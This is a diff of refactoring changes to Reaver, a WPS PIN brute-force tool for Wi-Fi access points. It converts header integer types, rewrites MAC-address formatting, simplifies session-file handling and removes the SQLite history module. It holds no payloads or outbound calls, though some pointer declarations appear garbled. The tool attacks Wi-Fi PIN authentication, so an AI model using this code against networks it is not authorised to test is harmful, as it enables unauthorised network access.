80	77	/*************************** VERSION ***************************/
81	78	/*

668	665	*/
669	666	struct iw_param
670	667	{
671		__s32 value; /* The value of the parameter itself */
672		__u8 fixed; /* Hardware should not use auto select */
673		__u8 disabled; /* Disable the feature */
674		__u16 flags; /* Various specifc flags (if any) */
	668	int32_t value; /* The value of the parameter itself */
	669	uint8_t fixed; /* Hardware should not use auto select */
	670	uint8_t disabled; /* Disable the feature */
	671	uint16_t flags; /* Various specifc flags (if any) */
675	672	};
676	673
677	674	/*

680	677	*/
681	678	struct iw_point
682	679	{
683		void __user pointer; / Pointer to the data (in user space) */
684		__u16 length; /* number of fields or size in bytes */
685		__u16 flags; /* Optional params */
	680	void pointer; / Pointer to the data (in user space) */
	681	uint16_t length; /* number of fields or size in bytes */
	682	uint16_t flags; /* Optional params */
686	683	};
687	684
688	685	/*

695	692	*/
696	693	struct iw_freq
697	694	{
698		__s32 m; /* Mantissa */
699		__s16 e; /* Exponent */
700		__u8 i; /* List index (when in range struct) */
701		__u8 flags; /* Flags (fixed/auto) */
	695	int32_t m; /* Mantissa */
	696	int16_t e; /* Exponent */
	697	uint8_t i; /* List index (when in range struct) */
	698	uint8_t flags; /* Flags (fixed/auto) */
702	699	};
703	700
704	701	/*

706	703	*/
707	704	struct iw_quality
708	705	{
709		__u8 qual; /* link quality (%retries, SNR,
	706	uint8_t qual; /* link quality (%retries, SNR,
710	707	%missed beacons or better...) */
711		__u8 level; /* signal level (dBm) */
712		__u8 noise; /* noise level (dBm) */
713		__u8 updated; /* Flags to know if updated */
	708	uint8_t level; /* signal level (dBm) */
	709	uint8_t noise; /* noise level (dBm) */
	710	uint8_t updated; /* Flags to know if updated */
714	711	};
715	712
716	713	/*

722	719	*/
723	720	struct iw_discarded
724	721	{
725		__u32 nwid; /* Rx : Wrong nwid/essid */
726		__u32 code; /* Rx : Unable to code/decode (WEP) */
727		__u32 fragment; /* Rx : Can't perform MAC reassembly */
728		__u32 retries; /* Tx : Max MAC retries num reached */
729		__u32 misc; /* Others cases */
	722	uint32_t nwid; /* Rx : Wrong nwid/essid */
	723	uint32_t code; /* Rx : Unable to code/decode (WEP) */
	724	uint32_t fragment; /* Rx : Can't perform MAC reassembly */
	725	uint32_t retries; /* Tx : Max MAC retries num reached */
	726	uint32_t misc; /* Others cases */
730	727	};
731	728
732	729	/*

735	732	*/
736	733	struct iw_missed
737	734	{
738		__u32 beacon; /* Missed beacons/superframe */
	735	uint32_t beacon; /* Missed beacons/superframe */
739	736	};
740	737
741	738	/*

762	759	*/
763	760	struct iw_scan_req
764	761	{
765		__u8 scan_type; /* IW_SCAN_TYPE_{ACTIVE,PASSIVE} */
766		__u8 essid_len;
767		__u8 num_channels; /* num entries in channel_list;
	762	uint8_t scan_type; /* IW_SCAN_TYPE_{ACTIVE,PASSIVE} */
	763	uint8_t essid_len;
	764	uint8_t num_channels; /* num entries in channel_list;
768	765	* 0 = scan all allowed channels */
769		__u8 flags; /* reserved as padding; use zero, this may
	766	uint8_t flags; /* reserved as padding; use zero, this may
770	767	* be used in the future for adding flags
771	768	* to request different scan behavior */
772	769	struct sockaddr bssid; /* ff:ff:ff:ff:ff:ff for broadcast BSSID or

778	775	* without having to change the current ESSID and potentially breaking
779	776	* the current association.
780	777	*/
781		__u8 essid[IW_ESSID_MAX_SIZE];
	778	uint8_t essid[IW_ESSID_MAX_SIZE];
782	779
783	780	/*
784	781	* Optional parameters for changing the default scanning behavior.

790	787	* replies are received, total time waited on the channel is defined by
791	788	* max_channel_time.
792	789	*/
793		__u32 min_channel_time; /* in TU */
794		__u32 max_channel_time; /* in TU */
	790	uint32_t min_channel_time; /* in TU */
	791	uint32_t max_channel_time; /* in TU */
795	792
796	793	struct iw_freq channel_list[IW_MAX_FREQUENCIES];
797	794	};

824	821	*/
825	822	struct iw_encode_ext
826	823	{
827		__u32 ext_flags; /* IW_ENCODE_EXT_* */
828		__u8 tx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
829		__u8 rx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
	824	uint32_t ext_flags; /* IW_ENCODE_EXT_* */
	825	uint8_t tx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
	826	uint8_t rx_seq[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
830	827	struct sockaddr addr; /* ff:ff:ff:ff:ff:ff for broadcast/multicast
831	828	* (group) keys or unicast address for
832	829	* individual keys */
833		__u16 alg; /* IW_ENCODE_ALG_* */
834		__u16 key_len;
835		__u8 key[0];
	830	uint16_t alg; /* IW_ENCODE_ALG_* */
	831	uint16_t key_len;
	832	uint8_t key[0];
836	833	};
837	834
838	835	/* SIOCSIWMLME data */
839	836	struct iw_mlme
840	837	{
841		__u16 cmd; /* IW_MLME_* */
842		__u16 reason_code;
	838	uint16_t cmd; /* IW_MLME_* */
	839	uint16_t reason_code;
843	840	struct sockaddr addr;
844	841	};
845	842

852	849
853	850	struct iw_pmksa
854	851	{
855		__u32 cmd; /* IW_PMKSA_* */
	852	uint32_t cmd; /* IW_PMKSA_* */
856	853	struct sockaddr bssid;
857		__u8 pmkid[IW_PMKID_LEN];
	854	uint8_t pmkid[IW_PMKID_LEN];
858	855	};
859	856
860	857	/* IWEVMICHAELMICFAILURE data */
861	858	struct iw_michaelmicfailure
862	859	{
863		__u32 flags;
	860	uint32_t flags;
864	861	struct sockaddr src_addr;
865		__u8 tsc[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
	862	uint8_t tsc[IW_ENCODE_SEQ_MAX_SIZE]; /* LSB first */
866	863	};
867	864
868	865	/* IWEVPMKIDCAND data */
869	866	#define IW_PMKID_CAND_PREAUTH 0x00000001 /* RNS pre-authentication enabled */
870	867	struct iw_pmkid_cand
871	868	{
872		__u32 flags; /* IW_PMKID_CAND_* */
873		__u32 index; /* the smaller the index, the higher the
	869	uint32_t flags; /* IW_PMKID_CAND_* */
	870	uint32_t index; /* the smaller the index, the higher the
874	871	* priority */
875	872	struct sockaddr bssid;
876	873	};

881	878	*/
882	879	struct iw_statistics
883	880	{
884		__u16 status; /* Status
	881	uint16_t status; /* Status
885	882	* - device dependent for now */
886	883
887	884	struct iw_quality qual; /* Quality of the link

919	916	struct iw_param txpower; /* default transmit power */
920	917	struct iw_param rts; /* RTS threshold threshold */
921	918	struct iw_param frag; /* Fragmentation threshold */
922		__u32 mode; /* Operation mode */
	919	uint32_t mode; /* Operation mode */
923	920	struct iw_param retry; /* Retry limits & lifetime */
924	921
925	922	struct iw_point encoding; /* Encoding stuff : tokens */

963	960	struct iw_range
964	961	{
965	962	/* Informative stuff (to choose between different interface) */
966		__u32 throughput; /* To give an idea... */
	963	uint32_t throughput; /* To give an idea... */
967	964	/* In theory this value should be the maximum benchmarked
968	965	* TCP/IP throughput, because with most of these devices the
969	966	* bit rate is meaningless (overhead an co) to estimate how

972	969	*/
973	970
974	971	/* NWID (or domain id) */
975		__u32 min_nwid; /* Minimal NWID we are able to set */
976		__u32 max_nwid; /* Maximal NWID we are able to set */
	972	uint32_t min_nwid; /* Minimal NWID we are able to set */
	973	uint32_t max_nwid; /* Maximal NWID we are able to set */
977	974
978	975	/* Old Frequency (backward compat - moved lower ) */
979		__u16 old_num_channels;
980		__u8 old_num_frequency;
	976	uint16_t old_num_channels;
	977	uint8_t old_num_frequency;
981	978
982	979	/* Wireless event capability bitmasks */
983		__u32 event_capa[6];
	980	uint32_t event_capa[6];
984	981
985	982	/* signal level threshold range */
986		__s32 sensitivity;
	983	int32_t sensitivity;
987	984
988	985	/* Quality of link & SNR stuff */
989	986	/* Quality range (link, level, noise)

1003	1000	struct iw_quality avg_qual; /* Quality of the link */
1004	1001
1005	1002	/* Rates */
1006		__u8 num_bitrates; /* Number of entries in the list */
1007		__s32 bitrate[IW_MAX_BITRATES]; /* list, in bps */
	1003	uint8_t num_bitrates; /* Number of entries in the list */
	1004	int32_t bitrate[IW_MAX_BITRATES]; /* list, in bps */
1008	1005
1009	1006	/* RTS threshold */
1010		__s32 min_rts; /* Minimal RTS threshold */
1011		__s32 max_rts; /* Maximal RTS threshold */
	1007	int32_t min_rts; /* Minimal RTS threshold */
	1008	int32_t max_rts; /* Maximal RTS threshold */
1012	1009
1013	1010	/* Frag threshold */
1014		__s32 min_frag; /* Minimal frag threshold */
1015		__s32 max_frag; /* Maximal frag threshold */
	1011	int32_t min_frag; /* Minimal frag threshold */
	1012	int32_t max_frag; /* Maximal frag threshold */
1016	1013
1017	1014	/* Power Management duration & timeout */
1018		__s32 min_pmp; /* Minimal PM period */
1019		__s32 max_pmp; /* Maximal PM period */
1020		__s32 min_pmt; /* Minimal PM timeout */
1021		__s32 max_pmt; /* Maximal PM timeout */
1022		__u16 pmp_flags; /* How to decode max/min PM period */
1023		__u16 pmt_flags; /* How to decode max/min PM timeout */
1024		__u16 pm_capa; /* What PM options are supported */
	1015	int32_t min_pmp; /* Minimal PM period */
	1016	int32_t max_pmp; /* Maximal PM period */
	1017	int32_t min_pmt; /* Minimal PM timeout */
	1018	int32_t max_pmt; /* Maximal PM timeout */
	1019	uint16_t pmp_flags; /* How to decode max/min PM period */
	1020	uint16_t pmt_flags; /* How to decode max/min PM timeout */
	1021	uint16_t pm_capa; /* What PM options are supported */
1025	1022
1026	1023	/* Encoder stuff */
1027		__u16 encoding_size[IW_MAX_ENCODING_SIZES]; /* Different token sizes */
1028		__u8 num_encoding_sizes; /* Number of entry in the list */
1029		__u8 max_encoding_tokens; /* Max number of tokens */
	1024	uint16_t encoding_size[IW_MAX_ENCODING_SIZES]; /* Different token sizes */
	1025	uint8_t num_encoding_sizes; /* Number of entry in the list */
	1026	uint8_t max_encoding_tokens; /* Max number of tokens */
1030	1027	/* For drivers that need a "login/passwd" form */
1031		__u8 encoding_login_index; /* token index for login token */
	1028	uint8_t encoding_login_index; /* token index for login token */
1032	1029
1033	1030	/* Transmit power */
1034		__u16 txpower_capa; /* What options are supported */
1035		__u8 num_txpower; /* Number of entries in the list */
1036		__s32 txpower[IW_MAX_TXPOWER]; /* list, in bps */
	1031	uint16_t txpower_capa; /* What options are supported */
	1032	uint8_t num_txpower; /* Number of entries in the list */
	1033	int32_t txpower[IW_MAX_TXPOWER]; /* list, in bps */
1037	1034
1038	1035	/* Wireless Extension version info */
1039		__u8 we_version_compiled; /* Must be WIRELESS_EXT */
1040		__u8 we_version_source; /* Last update of source */
	1036	uint8_t we_version_compiled; /* Must be WIRELESS_EXT */
	1037	uint8_t we_version_source; /* Last update of source */
1041	1038
1042	1039	/* Retry limits and lifetime */
1043		__u16 retry_capa; /* What retry options are supported */
1044		__u16 retry_flags; /* How to decode max/min retry limit */
1045		__u16 r_time_flags; /* How to decode max/min retry life */
1046		__s32 min_retry; /* Minimal number of retries */
1047		__s32 max_retry; /* Maximal number of retries */
1048		__s32 min_r_time; /* Minimal retry lifetime */
1049		__s32 max_r_time; /* Maximal retry lifetime */
	1040	uint16_t retry_capa; /* What retry options are supported */
	1041	uint16_t retry_flags; /* How to decode max/min retry limit */
	1042	uint16_t r_time_flags; /* How to decode max/min retry life */
	1043	int32_t min_retry; /* Minimal number of retries */
	1044	int32_t max_retry; /* Maximal number of retries */
	1045	int32_t min_r_time; /* Minimal retry lifetime */
	1046	int32_t max_r_time; /* Maximal retry lifetime */
1050	1047
1051	1048	/* Frequency */
1052		__u16 num_channels; /* Number of channels [0; num - 1] */
1053		__u8 num_frequency; /* Number of entry in the list */
	1049	uint16_t num_channels; /* Number of channels [0; num - 1] */
	1050	uint8_t num_frequency; /* Number of entry in the list */
1054	1051	struct iw_freq freq[IW_MAX_FREQUENCIES]; /* list */
1055	1052	/* Note : this frequency list doesn't need to fit channel numbers,
1056	1053	* because each entry contain its channel index */
1057	1054
1058		__u32 enc_capa; /* IW_ENC_CAPA_* bit field */
	1055	uint32_t enc_capa; /* IW_ENC_CAPA_* bit field */
1059	1056
1060	1057	/* More power management stuff */
1061		__s32 min_pms; /* Minimal PM saving */
1062		__s32 max_pms; /* Maximal PM saving */
1063		__u16 pms_flags; /* How to decode max/min PM saving */
	1058	int32_t min_pms; /* Minimal PM saving */
	1059	int32_t max_pms; /* Maximal PM saving */
	1060	uint16_t pms_flags; /* How to decode max/min PM saving */
1064	1061
1065	1062	/* All available modulations for driver (hw may support less) */
1066		__s32 modul_capa; /* IW_MODUL_* bit field */
	1063	int32_t modul_capa; /* IW_MODUL_* bit field */
1067	1064
1068	1065	/* More bitrate stuff */
1069		__u32 bitrate_capa; /* Types of bitrates supported */
	1066	uint32_t bitrate_capa; /* Types of bitrates supported */
1070	1067	};
1071	1068
1072	1069	/*

1075	1072
1076	1073	struct iw_priv_args
1077	1074	{
1078		__u32 cmd; /* Number of the ioctl to issue */
1079		__u16 set_args; /* Type and number of args */
1080		__u16 get_args; /* Type and number of args */
	1075	uint32_t cmd; /* Number of the ioctl to issue */
	1076	uint16_t set_args; /* Type and number of args */
	1077	uint16_t get_args; /* Type and number of args */
1081	1078	char name[IFNAMSIZ]; /* Name of the extension */
1082	1079	};
1083	1080

1093	1090	*/
1094	1091	struct iw_event
1095	1092	{
1096		__u16 len; /* Real lenght of this stuff */
1097		__u16 cmd; /* Wireless IOCTL */
	1093	uint16_t len; /* Real lenght of this stuff */
	1094	uint16_t cmd; /* Wireless IOCTL */
1098	1095	union iwreq_data u; /* IOCTL fixed payload */
1099	1096	};
1100	1097

1102	1099	#define IW_EV_LCP_LEN (sizeof(struct iw_event) - sizeof(union iwreq_data))
1103	1100	/* Size of the various events */
1104	1101	#define IW_EV_CHAR_LEN (IW_EV_LCP_LEN + IFNAMSIZ)
1105		#define IW_EV_UINT_LEN (IW_EV_LCP_LEN + sizeof(__u32))
	1102	#define IW_EV_UINT_LEN (IW_EV_LCP_LEN + sizeof(uint32_t))
1106	1103	#define IW_EV_FREQ_LEN (IW_EV_LCP_LEN + sizeof(struct iw_freq))
1107	1104	#define IW_EV_PARAM_LEN (IW_EV_LCP_LEN + sizeof(struct iw_param))
1108	1105	#define IW_EV_ADDR_LEN (IW_EV_LCP_LEN + sizeof(struct sockaddr))

+12

-28

src/misc.c less more

33	33	#include "misc.h"
34	34
35	35	/* Converts a raw MAC address to a colon-delimited string */
36		unsigned char mac2str(unsigned char mac, char delim)
	36	char mac2str(unsigned char mac, char delim)
37	37	{
38		int i = 0, str_len = 0;
39		int str_mult = 3;
40		int buf_size = str_mult+1;
41		unsigned char *str = NULL;
42		unsigned char buf[4] = { 0 }; /* 4 == buf_size */
43
44		str_len = (MAC_ADDR_LEN * str_mult) + 1;
45
46		str = malloc(str_len);
47		if(!str)
48		{
49		perror("malloc");
50		} else {
51		memset(str, 0, str_len);
52
53		for(i=0; i<MAC_ADDR_LEN; i++)
54		{
55		memset((char *) &buf, 0, buf_size);
56		snprintf((char *) &buf, buf_size, "%.2X%c", mac[i], delim);
57		strncat((char ) str, (char ) &buf, str_mult);
58		}
59		memset(str+((MAC_ADDR_LEN*str_mult)-1), 0, 1);
60		}
61
62		return str;
	38	char nyu[6*3];
	39	#define PAT "%.2X%c"
	40	#define PRT(X) mac[X], delim
	41	#define PBT "%.2X"
	42	if(delim)
	43	snprintf(nyu, sizeof nyu, PAT PAT PAT PAT PAT PBT, PRT(0), PRT(1), PRT(2), PRT(3), PRT(4), mac[5]);
	44	else
	45	snprintf(nyu, sizeof nyu, PBT PBT PBT PBT PBT PBT, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
	46	return strdup(nyu);
63	47	}
64	48
65	49	/* Converts a colon-delimited string to a raw MAC address */
66		void str2mac(unsigned char str, unsigned char mac)
	50	void str2mac(char str, unsigned char mac)
67	51	{
68	52	char delim_ptr = NULL, num_ptr = NULL, *tmp_str = NULL;
69	53	char delim = ':';
70	54	int count = 0;
71	55
72		tmp_str = strdup((char *) str);
	56	tmp_str = strdup(str);
73	57	delim_ptr = num_ptr = tmp_str;
74	58
75	59	while((delim_ptr = strchr(delim_ptr, delim)) && count < (MAC_ADDR_LEN-1))

+2

-2

src/misc.h less more

41	41	#include "init.h"
42	42	#include "globule.h"
43	43
44		unsigned char mac2str(unsigned char mac, char delim);
45		void str2mac(unsigned char str, unsigned char mac);
	44	char mac2str(unsigned char mac, char delim);
	45	void str2mac(char str, unsigned char mac);
46	46	void cprintf(enum debug_level level, const char *fmt, ...);
47	47	void daemonize(void);
48	48	void pcap_sleep(int seconds);

+1

-1

src/pins.c less more

78	78	else
79	79	{
80	80	/* Generate a 7-digit pin from the given key index values */
81		snprintf(key, pin_len, "%s%s", p1_value, p2_value);
	81	snprintf(key, pin_len-1, "%s%s", p1_value, p2_value);
82	82
83	83	/* Generate and append the pin checksum digit */
84	84	snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

~~src/reaver.db~~ less more

Binary diff not shown

+52

-69

src/session.c less more

32	32
33	33	#include "session.h"
34	34
	35	/* Does the configuration directory exist? Returns 1 for yes, 0 for no. */
	36	static int configuration_directory_exists()
	37	{
	38	struct stat dirstat;
	39	return (stat(CONF_DIR, &dirstat) == 0);
	40	}
	41
	42	static void gen_sessionfile_name(const char* bssid, char* outbuf) {
	43	#ifdef SAVETOCURRENT
	44	snprintf(outbuf, FILENAME_MAX, "%s.%s", bssid, CONF_EXT);
	45	#else
	46	int cde = configuration_directory_exists();
	47	snprintf(outbuf, FILENAME_MAX, "%s%s%s.%s",
	48	cde?CONF_DIR:"", cde?"/":"", bssid, CONF_EXT);
	49	#endif
	50	}
	51
35	52	int restore_session()
36	53	{
37	54	struct stat wpstat = { 0 };
38	55	char line[MAX_LINE_SIZE] = { 0 };
39	56	char temp[P1_READ_LEN] = { 0 };
40		char *file = NULL;
41		unsigned char *bssid = NULL;
	57	char file[FILENAME_MAX];
	58	char *bssid = NULL;
42	59	char answer = 0;
43	60	FILE *fp = NULL;
44	61	int ret_val = 0, i = 0;

49	66	*/
50	67	if(get_session())
51	68	{
52		file = strdup(get_session());
	69	strcpy(file, get_session());
53	70	}
54	71	else
55	72	{
56		file = malloc(FILENAME_MAX);
57		if(!file)
58		{
59		return ret_val;
60		}
61		memset(file, 0, FILENAME_MAX);
62
63	73	bssid = mac2str(get_bssid(), '\0');
64		snprintf(file, FILENAME_MAX, "%s/%s.%s", CONF_DIR, bssid, CONF_EXT);
	74	gen_sessionfile_name(bssid, file);
65	75	free(bssid);
66	76	}
67	77

69	79	* If a session was explicitly specified, or if the auto detect option was specified,
70	80	* then the answer to any of the following questions will be 'yes'.
71	81	*/
72		if(get_session() \|\| get_auto_detect_options())
	82	if(get_session())
73	83	{
74	84	answer = 'y';
75	85	}

92	102	if((fp = fopen(file, "r")))
93	103	{
94	104	/* Get the key1 index value */
95		if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL)
	105	if(fgets(line, MAX_LINE_SIZE, fp) != NULL)
96	106	{
97	107	set_p1_index(atoi(line));
98		memset((char *) &line, 0, MAX_LINE_SIZE);
	108	memset(line, 0, MAX_LINE_SIZE);
99	109
100	110	/* Get the key2 index value */
101		if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL)
	111	if(fgets(line, MAX_LINE_SIZE, fp) != NULL)
102	112	{
103	113	set_p2_index(atoi(line));
104		memset((char *) &line, 0, MAX_LINE_SIZE);
	114	memset(line, 0, MAX_LINE_SIZE);
105	115
106	116	/* Get the key status value */
107		if(fgets((char *) &line, MAX_LINE_SIZE, fp) != NULL)
	117	if(fgets(line, MAX_LINE_SIZE, fp) != NULL)
108	118	{
109	119	set_key_status(atoi(line));
110	120
111	121	/* Read in all p1 values */
112	122	for(i=0; i<P1_SIZE; i++)
113	123	{
114		memset((char *) &temp, 0, P1_READ_LEN);
115
116		if(fgets((char *) &temp, P1_READ_LEN, fp) != NULL)
	124	memset(temp, 0, P1_READ_LEN);
	125
	126	if(fgets(temp, P1_READ_LEN, fp) != NULL)
117	127	{
118	128	/* NULL out the new line character */
119	129	temp[P1_STR_LEN] = 0;
120		set_p1(i, (char *) &temp);
	130	set_p1(i, temp);
121	131	}
122	132	}
123	133
124	134	/* Read in all p2 values */
125	135	for(i=0; i<P2_SIZE; i++)
126	136	{
127		memset((char *) &temp, 0, P1_READ_LEN);
128
129		if(fgets((char *) &temp, P2_READ_LEN, fp) != NULL)
	137	memset(temp, 0, P1_READ_LEN);
	138
	139	if(fgets(temp, P2_READ_LEN, fp) != NULL)
130	140	{
131	141	/* NULL out the new line character */
132	142	temp[P2_STR_LEN] = 0;
133		set_p2(i, (char *) &temp);
	143	set_p2(i, temp);
134	144	}
135	145	}
136	146

153	163	cprintf(INFO, "[+] Restored previous session\n");
154	164	}
155	165
156		free(file);
157	166	return ret_val;
158	167	}
159	168
160	169	int save_session()
161	170	{
162		unsigned char *bssid = NULL;
	171	char *bssid = NULL;
163	172	char wpa_key = NULL, essid = NULL, *pretty_bssid = NULL;
164	173	char file_name[FILENAME_MAX] = { 0 };
165	174	char line[MAX_LINE_SIZE] = { 0 };

170	179
171	180	wps = get_wps();
172	181	bssid = mac2str(get_bssid(), '\0');
173		pretty_bssid = (char *) mac2str(get_bssid(), ':');
	182	pretty_bssid = mac2str(get_bssid(), ':');
174	183
175	184	if(wps)
176	185	{

190	199	*/
191	200	if(get_session())
192	201	{
193		memcpy((char *) &file_name, get_session(), FILENAME_MAX-1);
	202	strcpy(file_name, get_session());
194	203	}
195	204	else
196		{
197		/*
198		* If the configuration directory exists, save the session file there; else, save it to the
199		* current working directory.
200		*/
201		if(configuration_directory_exists())
202		{
203		snprintf((char *) &file_name, FILENAME_MAX, "%s/%s.%s", CONF_DIR, bssid, CONF_EXT);
204		}
205		else
206		{
207		snprintf((char *) &file_name, FILENAME_MAX, "%s.%s", bssid, CONF_EXT);
208		}
	205	{
	206	gen_sessionfile_name(bssid, file_name);
209	207	}
210	208
211	209	/* Don't bother saving anything if nothing has been done */
212	210	if((get_p1_index() > 0) \|\| (get_p2_index() > 0))
213	211	{
214		if((fp = fopen((char *) &file_name, "w")))
	212	if((fp = fopen(file_name, "w")))
215	213	{
216		snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_p1_index());
217		write_size = strlen((char *) &line);
	214	snprintf(line, MAX_LINE_SIZE, "%d\n", get_p1_index());
	215	write_size = strlen(line);
218	216
219	217	/* Save key1 index value */
220		if(fwrite((char *) &line, 1, write_size, fp) == write_size)
	218	if(fwrite(line, 1, write_size, fp) == write_size)
221	219	{
222		memset((char *) &line, 0, MAX_LINE_SIZE);
223		snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_p2_index());
224		write_size = strlen((char *) &line);
	220	memset(line, 0, MAX_LINE_SIZE);
	221	snprintf(line, MAX_LINE_SIZE, "%d\n", get_p2_index());
	222	write_size = strlen(line);
225	223
226	224	/* Save key2 index value */
227		if(fwrite((char *) &line, 1, write_size, fp) == write_size)
	225	if(fwrite(line, 1, write_size, fp) == write_size)
228	226	{
229		memset((char *) &line, 0, MAX_LINE_SIZE);
230		snprintf((char *) &line, MAX_LINE_SIZE, "%d\n", get_key_status());
231		write_size = strlen((char *) &line);
	227	memset(line, 0, MAX_LINE_SIZE);
	228	snprintf(line, MAX_LINE_SIZE, "%d\n", get_key_status());
	229	write_size = strlen(line);
232	230
233	231	/* Save key status value */
234		if(fwrite((char *) &line, 1, write_size, fp) == write_size)
	232	if(fwrite(line, 1, write_size, fp) == write_size)
235	233	{
236	234	/* Save all the p1 values */
237	235	for(i=0; i<P1_SIZE; i++)

269	267	{
270	268	essid = get_ssid();
271	269	}
272
273		update_history(pretty_bssid, essid, attempts, wpa_key);
274	270
275	271	ret_val = 1;
276	272	}

292	288	return ret_val;
293	289	}
294	290
295		/* Does the configuration directory exist? Returns 1 for yes, 0 for no. */
296		int configuration_directory_exists()
297		{
298		struct stat dirstat = { 0 };
299		int retval = 0;
300
301		if(stat(CONF_DIR, &dirstat) == 0)
302		{
303		retval = 1;
304		}
305
306		return retval;
307		}

+0

-2

src/session.h less more

38	38	#include "defs.h"
39	39	#include "misc.h"
40	40	#include "globule.h"
41		#include "sql.h"
42	41	#include "config.h"
43	42
44	43	#ifndef CONF_DIR

55	54
56	55	int restore_session();
57	56	int save_session();
58		int configuration_directory_exists();
59	57
60	58	#endif

+0

-412

~~src/sql.c~~ less more

0		/*
1		* Reaver - SQLite wrapper functions
2		* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
3		*
4		* This program is free software; you can redistribute it and/or modify
5		* it under the terms of the GNU General Public License as published by
6		* the Free Software Foundation; either version 2 of the License, or
7		* (at your option) any later version.
8		*
9		* This program is distributed in the hope that it will be useful,
10		* but WITHOUT ANY WARRANTY; without even the implied warranty of
11		* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12		* GNU General Public License for more details.
13		*
14		* You should have received a copy of the GNU General Public License
15		* along with this program; if not, write to the Free Software
16		* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17		*
18		*
19		* In addition, as a special exception, the copyright holders give
20		* permission to link the code of portions of this program with the
21		* OpenSSL library under certain conditions as described in each
22		* individual source file, and distribute linked combinations
23		* including the two.
24		* You must obey the GNU General Public License in all respects
25		* for all of the code used other than OpenSSL. * If you modify
26		* file(s) with this exception, you may extend this exception to your
27		* version of the file(s), but you are not obligated to do so. * If you
28		* do not wish to do so, delete this exception statement from your
29		* version. * If you delete this exception statement from all source
30		* files in the program, then also delete it here.
31		*/
32
33		#include "sql.h"
34
35		sqlite3 *db = NULL;
36
37		int sql_init(void)
38		{
39		int retval = 0;
40
41		if(!db)
42		{
43		if(sqlite3_open(REAVER_DATABASE, &db) == 0)
44		{
45		retval = 1;
46		}
47		}
48
49		return retval;
50		}
51
52		int create_ap_table(void)
53		{
54		int err_code = 0;
55		char *drop_table = sqlite3_mprintf(DROP_TABLE, AP_TABLE);
56		char *create_table = sqlite3_mprintf(CREATE_TABLE, AP_TABLE);
57
58		if(db && drop_table && create_table)
59		{
60		sql_exec(drop_table);
61		err_code = sql_exec(create_table);
62
63		sqlite3_free(drop_table);
64		sqlite3_free(create_table);
65		}
66
67		return err_code;
68		}
69
70		int should_probe(char *bssid)
71		{
72		int n = 0, yn = 0, size = 0, err = 0, max = get_max_num_probes();
73		char *ns = NULL;
74		char *q = sqlite3_mprintf("SELECT probes FROM %s WHERE bssid = %Q AND complete = 0", AP_TABLE, bssid);
75
76		if(q)
77		{
78		ns = get(q, &size, &err);
79		if(err == SQLITE_OK && ns && size > 0)
80		{
81		n = atoi(ns);
82		}
83
84		if(max == 0 \|\| n < max)
85		{
86		yn = 1;
87		}
88
89		sqlite3_free(q);
90		}
91
92		if(ns) free(ns);
93		return yn;
94		}
95
96		int is_done(char *bssid)
97		{
98		int size = 0, err = 0, rv = 0;
99		char s = NULL, q = sqlite3_mprintf("SELECT complete FROM %s WHERE bssid = %Q", AP_TABLE, bssid);
100
101		if(q)
102		{
103		s = get(q, &size, &err);
104
105		if(err == SQLITE_OK && size > 0 && s != NULL)
106		{
107		rv = atoi(s);
108		free(s);
109		}
110
111		sqlite3_free(q);
112		}
113
114		return rv;
115		}
116
117		int mark_ap_complete(char *bssid)
118		{
119		int rv = 0;
120		char *q = sqlite3_mprintf("UPDATE %s SET probes = '%d', complete = '1' WHERE bssid = %Q", AP_TABLE, get_max_num_probes(), bssid);
121
122		if(q)
123		{
124		if(sql_exec(q) == SQLITE_OK)
125		{
126		rv = 1;
127		}
128
129		sqlite3_free(q);
130		}
131
132		return rv;
133		}
134
135		int update_probe_count(char *bssid)
136		{
137		int rv = 0;
138		char *q = sqlite3_mprintf("UPDATE %s SET probes = probes+1 WHERE bssid = %Q", AP_TABLE, bssid);
139
140		if(q)
141		{
142		if(sql_exec(q) == SQLITE_OK)
143		{
144		rv = 1;
145		}
146
147		sqlite3_free(q);
148		}
149
150		return rv;
151		}
152
153		int update_ap_power(char *bssid, int8_t ssi)
154		{
155		int rv = 0;
156		char *q = sqlite3_mprintf("UPDATE %s SET rssi = '%d' WHERE bssid = %Q", AP_TABLE, ssi, bssid);
157
158		if(q)
159		{
160		if(sql_exec(q) == SQLITE_OK)
161		{
162		rv = 1;
163		}
164
165		sqlite3_free(q);
166		}
167
168		return rv;
169		}
170
171		int update_history(char bssid, char essid, int attempts, char *key)
172		{
173		int result = 0;
174		char *q = sqlite3_mprintf("INSERT OR REPLACE INTO %s (bssid, essid, attempts, key) VALUES (%Q, %Q, '%d', %Q)", HISTORY_TABLE, bssid, essid, attempts, key);
175
176		if(q)
177		{
178		if(sql_exec(q) == SQLITE_OK)
179		{
180		result = 1;
181		}
182
183		sqlite3_free(q);
184		}
185
186		return result;
187		}
188
189		int insert(char bssid, char essid, struct libwps_data *wps, int encryption, int rssi)
190		{
191		int result = 0;
192		char *q = sqlite3_mprintf("INSERT INTO %s (bssid, essid, manufacturer, model_name, model_number, device_name, version, state, locked, encryption, probes, rssi, rowid) VALUES (%Q, %Q, %Q, %Q, %Q, %Q, '%d', '%d', '%d', '%d', '0', '%d', '%d')", AP_TABLE, bssid, essid, wps->manufacturer, wps->model_name, wps->model_number, wps->device_name, wps->version, wps->state, wps->locked, encryption, rssi, sqlite3_last_insert_rowid(db));
193
194		if(q)
195		{
196		if(sql_exec(q) == SQLITE_OK)
197		{
198		result = 1;
199		}
200
201		sqlite3_free(q);
202		}
203
204		return result;
205		}
206
207		int update(char bssid, char essid, struct libwps_data *wps, int encryption)
208		{
209		int result = 0;
210		char *q = NULL;
211
212		if(wps)
213		{
